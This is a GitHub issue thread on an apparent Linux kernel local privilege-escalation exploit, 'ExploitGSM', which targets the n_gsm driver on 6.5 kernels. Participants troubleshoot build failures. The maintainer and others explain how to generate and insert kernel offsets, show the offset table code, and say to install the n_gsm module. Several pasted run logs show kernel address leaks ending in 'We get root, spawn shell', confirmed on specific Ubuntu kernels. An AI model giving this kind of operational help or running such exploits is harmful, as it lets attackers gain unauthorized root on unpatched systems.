Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Compile issue in ubuntu #6

Closed
kronostitanplay opened this issue Apr 10, 2024 · 12 comments
Closed

Compile issue in ubuntu #6

kronostitanplay opened this issue Apr 10, 2024 · 12 comments

Comments

@kronostitanplay
Copy link

kronostitanplay commented Apr 10, 2024
edited
Loading

error during make.

error: field ‘config’ has incomplete type
  228 |     struct gsm_dlci_config config;
      |                            ^~~~~~
In file included from /usr/include/x86_64-linux-gnu/asm/ioctl.h:1,
                 from /usr/include/linux/ioctl.h:5,
                 from /usr/include/linux/gsmmux.h:6,
                 from /home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:7:
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c: In function ‘thread_setconf_dlci’:
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:54:46: error: invalid application of ‘sizeof’ to incomplete type ‘struct gsm_dlci_config’
   54 | #define GSMIOC_SETCONF_DLCI     _IOW('G', 8, struct gsm_dlci_config)
      |                                              ^~~~~~
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:1137:42: note: in expansion of macro ‘GSMIOC_SETCONF_DLCI’
 1137 |     args->retval = ioctl(args->fd_input, GSMIOC_SETCONF_DLCI, &args->config);
      |                                          ^~~~~~~~~~~~~~~~~~~
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c: In function ‘thread_getconf_dlci’:
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:53:47: error: invalid application of ‘sizeof’ to incomplete type ‘struct gsm_dlci_config’
   53 | #define GSMIOC_GETCONF_DLCI     _IOWR('G', 7, struct gsm_dlci_config)
      |                                               ^~~~~~
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:1146:42: note: in expansion of macro ‘GSMIOC_GETCONF_DLCI’
 1146 |     args->retval = ioctl(args->fd_input, GSMIOC_GETCONF_DLCI, &args->config);
      |                                          ^~~~~~~~~~~~~~~~~~~
gmake[2]: *** [CMakeFiles/ExploitGSM.dir/build.make:76: CMakeFiles/ExploitGSM.dir/main.c.o] Error 1
gmake[1]: *** [CMakeFiles/Makefile2:83: CMakeFiles/ExploitGSM.dir/all] Error 2
@faveoled
Copy link

faveoled commented Apr 10, 2024
edited
Loading

what's your kernel version?

@kronostitanplay
Copy link
Author

6.5.0-26-generic #26~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Mar 12 10:22:43 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

@xpliz
Copy link

xpliz commented Apr 10, 2024
edited
Loading

Can't compile in ubuntu 6.5.0-17 nor 6.5.0-23. Same goes for Debian 12.

Removing last commit from ./ExploitGSM_6_5/main.c "works", and exploit compiles but will not run/do anything.

./ExploitGSM ubuntu
Error find kernel

@YuriiCrimson
Copy link
Owner

Can't compile in ubuntu 6.5.0-17 nor 6.5.0-23. Same goes for Debian 12.

Removing last commit from ./ExploitGSM_6_5/main.c "works", and exploit compiles but will not run/do anything.

./ExploitGSM ubuntu
Error find kernel

You should use Offset generator for adding kernel offsets

@faveoled
Copy link

faveoled commented Apr 10, 2024
edited
Loading

These lines should be changed with offset generator output (run it as root, change distro_name as needed):

ExploitGSM/ExploitGSM_6_5/main.c

Lines 368 to 371 in 0cc21d2

struct kernel_table kernels_offsets[] = {
{"ubuntu", "6.5.0-25-generic", false, false, false, true, false, 0x26933c0, 0x3910d00, 0xa22630, 0x1274c0, 0x133eb0, 0x1120a20},
{"fedora", "6.5.6-300.fc39.x86_64", false, false, false, true, false, 0x2ad7eb0, 0x3cfcc60, 0x9b4a30, 0x13c3d0, 0x148780, 0xfbbe20}
};

Worked on my KDE Neon, main.c commit reverted:

neon@neon:~/Downloads/ExploitGSM/ExploitGSM_6_5$ ./ExploitGSM ubuntu
permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffff8ea933a0 
text leaked address         -> ffffffff8c400000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
waiting setconf dlci thread 
Wait 3 sec for ending kernel work execution 
We get root, spawn shell 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@neon:/root# ^C        
neon@neon:~/Downloads/ExploitGSM/ExploitGSM_6_5$ uname -a
Linux neon 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb  9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

@kronostitanplay
Copy link
Author

After update kernel offset.

permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffffaaa933a0 
text leaked address         -> ffffffffa8400000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
Error set line discipline N_GSM, Invalid argument

@YuriiCrimson
Copy link
Owner

After update kernel offset.

permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffffaaa933a0 
text leaked address         -> ffffffffa8400000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
Error set line discipline N_GSM, Invalid argument

Because you not have n_gsm kernel module. Install extra kernel modules

@kronostitanplay
Copy link
Author

After update kernel offset.

permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffffaaa933a0 
text leaked address         -> ffffffffa8400000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
Error set line discipline N_GSM, Invalid argument

Because you not have n_gsm kernel module. Install extra kernel modules

Thanks it's works

permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffff9e0933a0 
text leaked address         -> ffffffff9ba00000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
waiting setconf dlci thread 
Wait 3 sec for ending kernel work execution 
We get root, spawn shell 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

@YuriiCrimson
Copy link
Owner

YuriiCrimson commented Apr 10, 2024
edited
Loading

Try my another exploit for Debian 12

@faveoled
Copy link

@kronostitanplay Could you update your system to see if it works on 6.5.0-27?

@psreverttoself
Copy link

@kronostitanplay Could you update your system to see if it works on 6.5.0-27?

Hi, I have confirmed this works on Ubuntu 22 LTS with kernel 6.5.0-27.

@kronostitanplay
Copy link
Author

@kronostitanplay Could you update your system to see if it works on 6.5.0-27?

Yes! it's working

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
5 participants
@xpliz @psreverttoself @YuriiCrimson @faveoled @kronostitanplay